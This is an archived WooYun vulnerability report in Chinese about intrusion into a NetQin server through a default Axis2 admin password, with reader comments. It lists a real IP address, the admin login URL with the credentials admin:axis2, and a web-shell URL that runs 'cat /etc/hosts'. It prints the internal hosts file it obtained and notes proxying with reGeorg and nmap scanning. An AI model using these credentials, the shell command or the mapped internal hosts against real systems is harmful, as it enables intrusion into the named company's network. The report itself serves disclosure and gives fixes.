网秦某站弱口令导致的一次内网漫游

admin

140350
文章

117
评论

2017年5月2日09:20:55评论406 views字数 224阅读0分44秒阅读模式

摘要

2016-06-16：细节已通知厂商并且等待厂商处理中
2016-06-16：厂商已查看当前漏洞内容,细节仅向厂商公开
2016-06-21：厂商已经主动忽略漏洞，细节向公众公开

漏洞概要关注数(18) 关注此漏洞

缺陷编号： WooYun-2016-219717

漏洞标题：网秦某站弱口令导致的一次内网漫游

漏洞作者： niliu

提交时间： 2016-06-16 07:46

公开时间： 2016-06-21 09:10

漏洞类型：成功的入侵事件

危害等级：高

自评Rank： 20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： getshell

4人收藏

漏洞详情

披露状态：

简要描述：

厂商给rank不要那么吝啬嘛 -,-

详细说明：

纯属偶遇，由Axis2的弱口令导致getshell，然后内网漫游了一下

http://211.151.59.27:80/axis2/axis2-admin/login

admin:axis2

漏洞证明：

getshell

http://211.151.59.27/axis2/services/Cat/exec?cmd=cat%20/etc/hosts

通过hosts可以看到是网秦的服务

code 区域

HEADER: This file was autogenerated at Thu Aug 21 16:56:16 +0800 2014
 # HEADER: by puppet.  While it can still be managed manually, it
 # HEADER: is definitely not recommended.
 # Do not remove the following line, or various programs
 # that require network functionality will fail.
 127.0.0.1 localhost.localdomain localhost BJ-YZ-S-ST040
 ::1 localhost6.localdomain6 localhost6
 127.0.0.1 oversea
 192.168.3.46 bjyz.puppet.nq.com
 192.168.0.41 a03 pbsvc.nqcloud.com comcon.netqin.com cn-pbsvc.nq.com pbsvc.nq.com cn-pbsvc-dl.nq.com i-contact.netqin.com
 192.168.0.217 a12 app.netqin.com
 211.151.59.71 a09 blyt.netqin.com
 192.168.0.143 a08 i.netqin.com i.nq.com m.nq.com
 192.168.5.212 a13 c.cpsserver.cns
 192.168.0.148 a05 nqses.nq.com
 192.168.3.35 a11 pay.netqin.com pay.nq.com
 192.168.3.53 a07 my.netqin.com
 192.168.3.52 a06 mpay.nq.com my.nq.com jf.netqin.com wurfl.netqin.com wapcms.netqin.com r.netqin.cn wap.netqin.com ad.netqin.com new.netqin.com
 192.168.5.216 a15 dbapp.nq.com
 192.168.5.207 a16 dbboss.nq.com
 192.168.5.218 a14 dbuis.nq.com

拿到shell了，reGeorg开个代理进内网

namp扫了一下内网网段，内网比较大

设计大量内部系统，wiki，jenkins，jira,内部管理系统，会议室预定系统，报表管理系统等等，以及大量开发测试文档

程序员千行bug率....

jenkins 又可以搞下好多机器了

可申请点卡..

不深入测试了

修复方案：

1.修复弱口令

2.删除shell，不排除之前有人进来过

3.加强内网安全

版权声明：转载请注明来源 niliu@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2016-06-21 09:10

厂商回复：

漏洞Rank：15 (WooYun评价)

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(少于3人评价):

登陆后才能进行评分

100%

评价

2016-06-21 09:26 | HackBraid ( 核心白帽子 | Rank:1914 漏洞数:304 | 最近有人冒充该账号行骗，任何自称HackBrai...)

0

这个严重额，竟然忽略了

1# 回复此人
2016-06-21 09:34 | niliu ( 核心白帽子 | Rank:1803 漏洞数:236 | 逆流而上)

0

@HackBraid 其实厂商第二天就修复了...还好乌云有补rank机制

2# 回复此人
2016-06-21 09:48 | niliu ( 核心白帽子 | Rank:1803 漏洞数:236 | 逆流而上)

0

@网秦漏洞好像并没有修复。。。

3# 回复此人
2016-06-21 09:51 | 心云 ( 普通白帽子 | Rank:534 漏洞数:146 | 有追求，才会有提高！尽快达到下一个目标!)

0

如何getshell的？上传？

4# 回复此人
2016-06-21 10:07 | niliu ( 核心白帽子 | Rank:1803 漏洞数:236 | 逆流而上)

0

@心云是啊..

5# 回复此人
2016-06-21 11:23 | 陆由乙 ( 普通白帽子 | Rank:620 漏洞数:137 | 我是突突兔！)

0

@niliu 的确没修

6# 回复此人
2016-06-24 10:50 | 尊尼获加 ( 路人 | Rank:10 漏洞数:4 | 想要做到不可替代，你就必须与众不同)

0

Axis2 一句话怎么上传的大表哥？

7# 回复此人

漏洞概要 关注数(18) 关注此漏洞